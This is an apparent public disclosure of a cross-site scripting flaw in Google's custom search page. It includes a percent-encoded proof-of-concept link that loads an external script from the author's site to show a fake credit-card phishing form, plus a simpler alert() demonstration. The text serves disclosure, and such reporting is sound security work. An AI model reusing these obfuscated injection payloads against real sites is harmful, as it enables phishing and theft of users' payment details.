Google Script Insertion Exploit
Website: www.google.com
Description: Google's custom websearch does not prevent javascript from
being inserted into the url of the image, allowing malicious users to modify
the content of the google page allowing in phishing attacks, or silently
steal search terms/results/clicks or modify actual searches to always
contain controlled results. With Googles trusted status, the risk is almost
certainly high.
The exploit is easiest to produce through a custom google search form which
are commonly seen, used and understood on the web, but you can also do it
through a simple link, this one works in IE:
http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%6a%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75%6d%65%6e%74%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%74%65%73%74%32%2e%6a%73%27
(This is an example of using the exploit for phishing, it changes the google
search page to a page informing the user, that google is now a chargeable
service and they should enter their credit card details to continue, these
are then logged on my site and the user is returned to a working google -
currently there's an confirm box warning the user before the form is
submitted.)
This example only works in IE, but other UA's also execute the javascript -
it being a Google vulnerability, not an IE one.
The exploit can be simply demonstrated with, the simpler url:
http://www.google.com/custom?cof=L:javascript:javascript:alert('EEK!')
The exploit has been public for over 2 years, and google have been informed
on multiple occasions.
More information, and another example exploit at
http://jibbering.com/2004/10/google.html
Jim Ley.
http://jibbering.com/